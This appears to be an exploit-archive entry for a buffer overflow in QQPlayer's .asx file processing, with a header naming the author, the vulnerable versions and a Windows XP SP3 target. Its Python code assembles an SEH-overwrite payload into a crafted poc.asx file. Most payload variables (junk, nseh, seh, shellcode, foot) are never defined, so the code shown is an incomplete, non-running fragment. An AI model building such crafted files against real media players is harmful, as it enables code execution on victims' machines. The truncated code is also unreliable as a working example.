#################################################################
#
# Title: QQPlayer asx File Processing Buffer Overflow Exploit
# Author: Li Qingshan of Information Security Engineering Center, School of Software and Microelectronics, Peking University
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Test: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
# Payload = calc
#
#################################################################
# Code :
head =''' '''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.asx","w")
fobj.write(payload)
fobj.close()